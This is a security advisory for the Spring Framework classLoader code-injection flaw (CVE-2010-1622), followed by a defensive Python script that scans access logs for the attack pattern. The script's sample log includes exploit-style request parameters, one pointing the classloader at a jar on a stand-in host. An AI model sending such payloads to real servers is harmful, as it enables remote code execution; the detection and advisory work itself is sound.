CVE-2010-1622

Improper Control of Generation of Code ('Code Injection') in maven/org.springframework/spring

Identifiers

GHSA-vpr3-f594-mg5g, CVE-2010-1622

Package Slug

maven/org.springframework/spring

Vulnerability

Improper Control of Generation of Code ('Code Injection')

Description

SpringSource Spring Framework 2.5.x before 2.5.6.SEC02, 2.5.7 before 2.5.7.SR01, and 3.0.x before 3.0.3 allows remote attackers to execute arbitrary code via an HTTP request containing class.classLoader.URLs[0]=jar: followed by a URL of a crafted .jar file.
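
Added example (not part of the advisory or of Spring's code): a log-review check that flags request parameters whose bind path walks from a bean's class property to classLoader, the pattern named in the description above. The function names and the sample log entries are constructed for illustration; matching the pattern at any depth of the path and ignoring case are conservative assumptions of this example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line inside a combined-format access log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|PATCH|DELETE|HEAD) (\S+) HTTP/[\d.]+"')
INDEX_RE = re.compile(r"\[[^\]]*\]")  # indexed-property suffix such as [0]


def is_classloader_path(param_name: str) -> bool:
    """True if a bind path walks from a bean's 'class' property to 'classLoader'."""
    # Decode once more to catch double-encoded names; compare case-insensitively
    # (both are conservative choices made for this example).
    name = unquote(param_name).lower()
    segments = [INDEX_RE.sub("", s) for s in name.split(".")]
    return any(a == "class" and b == "classloader"
               for a, b in zip(segments, segments[1:]))


def suspicious_params(target: str, form_body: str = "") -> list[str]:
    """Return parameter names in a query string or form body that match."""
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    pairs += parse_qsl(form_body, keep_blank_values=True)
    return [name for name, _ in pairs if is_classloader_path(name)]


def scan_access_log(lines):
    """Return (line_number, parameter_name) for each hit in access-log lines."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            hits += [(number, name) for name in suspicious_params(match.group(1))]
    return hits


# Constructed sample entries (not taken from any real system).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Jun/2022:10:00:01 +0000] "GET /owners?lastName=Smith&class=B HTTP/1.1" 200 512',
    '192.0.2.44 - - [19/Jun/2022:10:00:07 +0000] "POST /owners/new?class.classLoader.URLs%5B0%5D=jar:http://files.example.invalid/a.jar!/ HTTP/1.1" 200 90',
    '192.0.2.44 - - [19/Jun/2022:10:00:09 +0000] "GET /owners/7?pet.%43lass.ClassLoader.URLs%5b0%5d=x HTTP/1.1" 200 90',
    '192.0.2.10 - - [19/Jun/2022:10:00:12 +0000] "GET /search?className=Loader&classroom=4 HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for number, name in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: suspicious bind parameter {name!r}")
```

Access logs normally record only the query string, so form-encoded POST bodies have to be passed to suspicious_params from wherever they are captured.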

Affected Versions

All versions starting from 2.5.0 up to 2.5.6, all versions starting from 3.0.0 up to 3.0.2

Solution

Upgrade to versions 2.5.7, 3.0.3 or above.

Last Modified

2022-06-19
